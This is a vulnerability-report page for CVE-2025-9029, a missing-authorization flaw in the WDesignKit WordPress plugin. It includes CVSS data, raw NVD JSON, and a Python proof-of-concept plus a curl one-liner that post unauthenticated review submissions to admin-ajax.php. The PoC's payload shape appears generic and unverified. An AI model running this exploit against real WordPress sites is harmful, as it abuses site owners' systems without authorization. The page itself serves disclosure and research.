Security Vulnerability Report
中文
CVE-2025-9029 CVSS 4.3 MEDIUM

CVE-2025-9029

Published: 2025-10-04 03:15:38
Last Modified: 2026-04-15 00:35:42

Description

The WDesignKit – Elementor & Gutenberg Starter Templates, Patterns, Cloud Workspace & Widget Builder plugin for WordPress is vulnerable to missing authorization via the wdkit_handle_review_submission function in versions less than, or equal to, 1.2.16. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to submit feedback data to external services.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WDesignKit插件 <= 1.2.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9029 PoC - WDesignKit Missing Authorization # Vulnerability: Unauthenticated feedback submission via wdkit_handle_review_submission # Affected versions: <= 1.2.16 # Fixed in: 1.2.17 import requests # Target WordPress site with vulnerable WDesignKit plugin TARGET_URL = "http://target-wordpress-site.com" AJAX_ENDPOINT = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Exploit payload - submit feedback without authentication payload = { "action": "wdkit_handle_review_submission", "review_data": { "rating": "5", "comment": "Malicious feedback injected by attacker", "email": "[email protected]", "username": "unauthorized_user" } } def exploit_missing_authorization(target_url, payload): """ Exploit missing authorization in WDesignKit's review submission function. No authentication or nonce verification required. """ endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Send unauthenticated POST request to trigger the vulnerable function response = requests.post( endpoint, data=payload, headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded" } ) if response.status_code == 200: print(f"[+] Exploit successful! Status: {response.status_code}") print(f"[+] Response: {response.text[:500]}") return True else: print(f"[-] Exploit failed. Status: {response.status_code}") return False # Execute exploit if __name__ == "__main__": exploit_missing_authorization(TARGET_URL, payload) # Alternative: Direct curl command # curl -X POST "http://target-wordpress-site.com/wp-admin/admin-ajax.php" \ # -d "action=wdkit_handle_review_submission&review_data[rating]=5&review_data[comment]=test"

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9029", "sourceIdentifier": "[email protected]", "published": "2025-10-04T03:15:38.290", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WDesignKit – Elementor & Gutenberg Starter Templates, Patterns, Cloud Workspace & Widget Builder plugin for WordPress is vulnerable to missing authorization via the wdkit_handle_review_submission function in versions less than, or equal to, 1.2.16. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to submit feedback data to external services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wdesignkit/tags/1.2.17/includes/admin/notices/class-wdkit-review-form.php#L117", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e89f0699-42be-403a-8cdb-31e214a85851?source=cve", "source": "[email protected]"}]}}